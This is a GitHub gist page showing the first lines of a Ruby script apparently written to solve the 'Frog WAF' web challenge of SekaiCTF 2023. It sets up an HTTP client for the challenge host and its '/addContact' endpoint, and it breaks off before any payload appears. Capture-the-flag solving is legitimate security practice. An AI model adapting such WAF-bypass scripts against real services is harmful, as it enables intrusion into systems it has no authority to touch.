Skip to content

Instantly share code, notes, and snippets.

View maikypedia's full-sized avatar
🍊

Maiky maikypedia

🍊
View GitHub Profile
@maikypedia
maikypedia / script.rb
Last active August 29, 2023 19:31
SekaiCTF 2023 Frog WAF
require 'net/http'
require 'json'
# ENV['http_proxy'] = 'http://127.0.0.1:8080' # Burp Listener
$domain = 'frog-waf.chals.sekai.team'
$endpoint = "/addContact"
$http = Net::HTTP.new($domain)
def array_int num